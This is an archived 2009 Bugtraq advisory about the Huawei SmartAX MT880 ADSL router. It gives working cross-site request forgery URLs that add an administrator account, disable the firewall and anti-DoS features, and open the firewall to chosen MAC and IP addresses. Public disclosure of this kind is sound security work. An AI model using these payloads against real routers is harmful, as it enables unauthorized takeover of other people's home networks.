lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <300597722.3938281249486317242.JavaMail.root@zimbra1-e1.priv.proxad.net>
Date: Wed, 5 Aug 2009 17:31:57 +0200 (CEST)
From: jerome.athias@...e.fr
To: bugtraq@...urityfocus.com
Subject: Multiple Flaws in Huawei SmartAX MT880 [was: Multiple Flaws in
 Huawei D100]

Description:
Huawei MT880 is a device offered by the algerian telecom operator - FAWRI, to provide ADSL Internet connexion and it's already widely in use.
Overview:
Huawei MT880 firmware and its default configuration has flaws, which allows LAN users to gain unauthorized full access to device.

Here are just limited PoCs.
Possible XSRFs:

Adding an administrator user:
http://192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70

Disabling firewall/anti-DoS... features:
http://192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70

Adding a MAC address to the whitelist:
http://192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insrcmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrcmac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=000000000000&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inblocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=000000000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insrcmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrcmac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104

Adding an IP address allowed by the firewall:
http://192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7

Over flaws are not covered in this advisory.

Cheers
/JA

Jerome Athias
JA-PSI, French IT Security Company
http://www.ja-psi.fr

Are you ready to FRHACK?
International, Technical IT Security Conferences & Trainings, September 7-11th, France
http://www.frhack.org

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ